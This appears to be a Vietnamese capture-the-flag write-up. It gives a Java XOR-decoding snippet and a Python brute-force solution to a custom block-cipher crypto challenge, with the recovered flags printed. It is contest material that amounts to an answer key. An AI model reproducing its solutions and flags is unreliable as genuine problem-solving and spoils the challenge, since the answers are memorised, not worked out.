![](https://hackmd.io/_uploads/SyWHieFKh.png) Script: ```java import java.util.Base64; public class Main { public static void main(String[] args) { getFlag("MBw6FDdZBT4wRzkQMB0jYEc8EUUDLQwjPiE8LR0TDw==","sTroN6PaSswORD"); } public static void getFlag(String base64, String key) { byte[] decode = Base64.getDecoder().decode(base64); byte[] bArr = new byte[decode.length]; byte[] bytes = key.getBytes(); int length = decode.length; for (int i7 = 0; i7 < length; i7++) { bArr[i7] = (byte) (decode[i7] ^ bytes[i7 % bytes.length]); } for(int i=0; i< bArr.length ; i++) { System.out.print(bArr[i] +" "); } }; } ``` # Crypto ## Basic Operator Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/basic-operator Script brute force từ block 1 đến block 10 (vì block 0 đoán được là `CHH{`): ```python from string import printable from tqdm import tqdm def padding_pkcs7(data,block_size=4): tmp = len(data) + (block_size - len(data) % block_size) return data.ljust(tmp,bytes([block_size-(len(data)%block_size)])) def split_block(data,block_size): return list(int.from_bytes(data[i:i+block_size],'little') for i in range(0,len(data),block_size)) def plus_func(data,shift): return (data+shift)&0xffffffff def mul_func(data,mul): return (data*mul)&0xffffffff def xor_shift_right_func(data,bit_loc): return (data^(data>>bit_loc))&0xffffffff def pow_func(data,e,p): return pow(data,e,p) def exp_func(data,base,p): return pow(base,data,p) def ecb_mode(data): return list(pow_func(exp_func(xor_shift_right_func(mul_func(plus_func(block,3442055609),2898124289),1),e,p),e,p) for block in split_block(padding_pkcs7(data,4),4)) def brute_force(index): for a in range(len(printable)): for b in range(len(printable)): for c in range(len(printable)): for d in range(len(printable)): tmp = (printable[a]+printable[b]+printable[c]+printable[d]).encode() enc = ecb_mode(tmp)[0] if enc == cipher[index]: return tmp cipher = [752589857254588976778, 854606763225554935934, 102518422244000685572, 779286449062901931327, 424602910997772742508, 1194307203769437983433, 501056821915021871618, 691835640758326884371, 778501969928317687301, 1260460302610253211574, 833211399330573153864, 223847974292916916557] p = 1341161101353773850779 e = 2 flag = b'CHH{' for index in range(1, 11): flag += brute_force(index) print(flag) ``` Ở block cuối có 3 trường hợp có thể xảy ra: - 1 ký tự flag tương đương `}\x03\x03\x03` - 2 ký tự flag tương đương `X}\x02\x02` - 3 ký tự flag tương đương `XX}\x01` Thử 3 trường hợp thì mình thấy trường hợp 3 là đúng, script brute force block cuối cùng ```python for i in range(len(printable)): for j in range(len(printable)): tmp = (printable[i]+ printable[j]+ '}').encode() + b'\x01' enc = ecb_mode(tmp)[0] if enc == cipher[11]: print(flag+tmp) exit(0) ``` Flag: CHH{w3lc0m3_70_7h3_m47h_w0rld(1_h4t3_1t_th3r3)}